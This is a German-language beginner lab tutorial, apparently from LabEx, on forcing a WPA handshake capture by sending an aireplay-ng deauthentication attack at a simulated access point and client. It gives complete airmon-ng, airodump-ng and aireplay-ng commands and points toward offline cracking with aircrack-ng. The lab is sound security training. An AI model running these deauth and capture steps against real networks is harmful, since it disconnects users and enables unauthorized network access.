LabEx
LoginBeitreten

WPA-Handshake mit einem aireplay-ng Deauth-Angriff erzwingen

Beginner
Jetzt üben

Einleitung

Willkommen zu diesem Lab über das Erzwingen einer WPA-Handshake-Erfassung. Der WPA/WPA2-Vier-Wege-Handshake ist eine kritische Datenmenge, die benötigt wird, um zu versuchen, das Passwort eines Wi-Fi-Netzwerks zu knacken. Während Sie passiv darauf warten können, dass sich ein Gerät mit dem Netzwerk verbindet, um diesen Handshake zu erfassen, kann dies zeitaufwendig sein.

Ein aktiverer Ansatz besteht darin, einen aktuell verbundenen Client zum Trennen und sofortigen Wiederverbinden zu zwingen. Dieser Vorgang wird als Deauthentifizierungs- (oder "Deauth"-) Angriff bezeichnet. Wenn sich der Client wieder verbindet, führt er den Vier-Wege-Handshake durch, den Sie dann erfassen können.

In diesem Lab verwenden Sie aireplay-ng, ein leistungsstarkes Werkzeug aus der aircrack-ng-Suite, um einen Deauthentifizierungsangriff auf einen simulierten Wi-Fi-Client durchzuführen. Dies ermöglicht Ihnen, den WPA-Handshake zuverlässig zur Analyse zu erfassen. Unsere Laborumgebung wurde mit einem virtuellen drahtlosen Zugriffspunkt (AP) namens MyTestAP und einem verbundenen Client vorkonfiguriert.

Identifizieren eines verbundenen Clients aus einem airodump-ng Scan

In diesem Schritt bereiten Sie Ihre drahtlose Schnittstelle für die Überwachung vor und verwenden dann airodump-ng, um den Zielzugangspunkt und seinen verbundenen Client zu finden.

Zuerst müssen Sie eine Ihrer virtuellen drahtlosen Schnittstellen in den Monitor-Modus versetzen. Dieser Modus ermöglicht es der Schnittstelle, den gesamten Wi-Fi-Verkehr in der Luft zu erfassen, nicht nur den Verkehr, der an sie gerichtet ist. Wir werden die Schnittstelle wlan1 verwenden.

Führen Sie den folgenden Befehl aus, um den Monitor-Modus auf wlan1 zu starten:

sudo airmon-ng start wlan1

Dieser Befehl erstellt eine neue Monitor-Schnittstelle, die normalerweise wlan1mon genannt wird. Sie sollten eine Ausgabe sehen, die bestätigt, dass der Modus aktiviert wurde.

PHY     Interface       Driver          Chipset

phy0    wlan0           mac80211_hwsim  Software simulator
phy1    wlan1           mac80211_hwsim  Software simulator

                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)

Führen Sie nun airodump-ng auf der neuen Monitor-Schnittstelle (wlan1mon) aus, um mit dem Scannen zu beginnen. Wir verwenden das Flag -w, um die erfassten Pakete in eine Datei namens capture zu schreiben, und geben die BSSID und den Kanal unseres Ziel-AP an, um den Scan zu fokussieren. Die BSSID für unseren simulierten AP ist 02:00:00:00:01:00 und er befindet sich auf Kanal 6.

sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon

Lassen Sie airodump-ng laufen. Sie sehen einen Bildschirm, der sich in Echtzeit aktualisiert. Der obere Teil listet die umliegenden Zugangspunkte auf, und der untere Teil listet die mit ihnen verbundenen Clients auf. Sie sollten unseren AP, MyTestAP, und einen damit verbundenen Client sehen.

Die Ausgabe wird in etwa so aussehen:

CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       10        5    0   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -35    0- 1      0        5

Identifizieren und notieren Sie aus dieser Ausgabe:

  • BSSID: 02:00:00:00:01:00 (Die MAC-Adresse des AP).
  • STATION: 02:00:00:00:02:00 (Die MAC-Adresse des verbundenen Clients).

Lassen Sie dieses Terminal laufen. Sie werden es später benötigen, um die Erfassung des Handshakes zu bestätigen.

Öffnen eines neuen Terminals für den Deauthentifizierungsangriff

In diesem Schritt öffnen Sie ein neues Terminalfenster. Der airodump-ng-Befehl aus dem vorherigen Schritt muss im ersten Terminal weiterlaufen, um auf den WPA-Handshake zu warten. Der Deauthentifizierungsangriff wird von einem zweiten, separaten Terminal aus gestartet.

Um ein neues Terminal zu öffnen, klicken Sie auf das +-Symbol in der Terminal-Tab-Leiste oben im Terminalfenster.

Neues Terminal öffnen

Sobald das neue Terminal geöffnet ist, befinden Sie sich im Verzeichnis ~/project und sind bereit, den Angriffsbefehl im nächsten Schritt auszuführen. Alle nachfolgenden Befehle für den Angriff selbst sollten in diesem neuen Terminal ausgeführt werden.

Erstellen des aireplay-ng Deauth-Befehls mit --deauth

In diesem Schritt erstellen Sie den aireplay-ng-Befehl, der den Deauthentifizierungsangriff durchführt. Sie verwenden die Informationen, die Sie in Schritt 1 gesammelt haben.

Die grundlegende Syntax für einen Deauth-Angriff mit aireplay-ng lautet:
aireplay-ng --deauth <anzahl_pakete> -a <AP_BSSID> -c <Client_STATION> <schnittstelle>

Lassen Sie uns die Komponenten aufschlüsseln:

  • --deauth: Dieses Flag gibt den Deauthentifizierungsangriffsmodus an.
  • <anzahl_pakete>: Dies ist die Anzahl der zu sendenden Deauth-Pakete. Das Senden eines kleinen Bursts, wie z. B. 5, reicht normalerweise aus, um den Client zu trennen.
  • -a <AP_BSSID>: Dies gibt die MAC-Adresse des Ziel-Access-Points an. Aus Schritt 1 ist dies 02:00:00:00:01:00.
  • -c <Client_STATION>: Dies gibt die MAC-Adresse des Clients an, den Sie trennen möchten. Aus Schritt 1 ist dies 02:00:00:00:02:00.
  • <schnittstelle>: Dies ist Ihre drahtlose Schnittstelle im Monitor-Modus, nämlich wlan1mon.

Stellen Sie nun den vollständigen Befehl in Ihrem neuen Terminal zusammen. Er sollte genau so aussehen:

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

Drücken Sie noch nicht Enter. Im nächsten Schritt führen Sie diesen Befehl aus.

Ausführen des Angriffs auf den Client und den AP

In diesem Schritt führen Sie den gerade erstellten Befehl aus, um den Angriff zu starten.

Drücken Sie in Ihrem zweiten Terminalfenster die Eingabetaste (Enter), um den aireplay-ng-Befehl auszuführen.

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

Das Tool beginnt sofort mit dem Senden von Deauthentifizierungs-Paketen. Die Ausgabe zeigt die Uhrzeit und dass gerichtete Deauths an den Client gesendet werden.

Die Ausgabe wird wie folgt aussehen:

10:35:10  Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...

Der Angriff ist sehr schnell. Sobald Sie den Befehl ausführen, wird der anvisierte Client vom Netzwerk getrennt und versucht sofort, sich wieder zu verbinden. Dieser Wiederverbindungsprozess generiert den WPA-Handshake, den wir erfassen möchten.

Wechseln Sie schnell zurück zu Ihrem ersten Terminal (dem, auf dem airodump-ng läuft), um das Ergebnis im nächsten Schritt zu beobachten.

Bestätigen der Handshake-Erfassung im airodump-ng-Fenster

In diesem Schritt bestätigen Sie den Erfolg des Deauthentifizierungsangriffs, indem Sie die WPA-Handshake-Nachricht in Ihrem airodump-ng-Fenster überprüfen.

Wechseln Sie zurück zu Ihrem ersten Terminal. Wenn der Angriff funktioniert hat, sehen Sie in der oberen rechten Ecke der airodump-ng-Anzeige eine neue Nachricht:

WPA handshake: 02:00:00:00:01:00

Diese Nachricht bestätigt, dass airodump-ng den Vier-Wege-Handshake für die angegebene BSSID erfolgreich abgefangen und aufgezeichnet hat.

CH  6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       48       82    1   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -36    0- 1      0       75

Nachdem Sie nun den Handshake haben, können Sie die Erfassung stoppen. Drücken Sie Strg+C im airodump-ng-Terminal, um ihn zu beenden.

Da Sie in Schritt 1 das Flag -w capture verwendet haben, hat airodump-ng den erfassten Datenverkehr in Dateien in Ihrem aktuellen Verzeichnis (~/project) gespeichert. Listen Sie die Dateien auf, um die Ergebnisse zu sehen.

ls -l

Sie sollten mehrere Dateien sehen, die mit capture beginnen, einschließlich capture-01.cap. Diese .cap-Datei enthält die rohen Paketdaten, einschließlich des gerade erfassten WPA-Handshakes.

-rw-r--r-- 1 root  root    450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root  root    892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root  root    634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root  root    128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex   121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex    52 Oct 27 10:28 wpa_supplicant.conf

Die Datei capture-01.cap ist der Hauptgewinn. Sie kann nun mit Tools zur Passwortknackung wie aircrack-ng verwendet werden, um den Pre-Shared Key des Netzwerks zu ermitteln.

Zusammenfassung

Herzlichen Glückwunsch zum Abschluss dieses Labs! Sie haben erfolgreich einen Deauthentifizierungsangriff durchgeführt, um einen WPA-Handshake zu erzwingen und zu erfassen.

In diesem Lab haben Sie gelernt, wie Sie:

  • Eine drahtlose Schnittstelle in den Monitor-Modus versetzen mit airmon-ng.
  • Ein Ziel-AP und einen Client mit airodump-ng scannen und identifizieren.
  • Einen Deauthentifizierungsangriff mit aireplay-ng konstruieren und ausführen.
  • Die Erfassung des WPA-Handshakes bestätigen und die resultierende .cap-Datei lokalisieren.

Dies ist eine grundlegende Fähigkeit im Bereich der drahtlosen Netzwerksicherheitstests. Die erfasste Handshake-Datei ist die Schlüsselkomponente für die nächste Phase: das Offline-Passwort-Cracking mit einem Tool wie aircrack-ng und einer umfassenden Wortliste.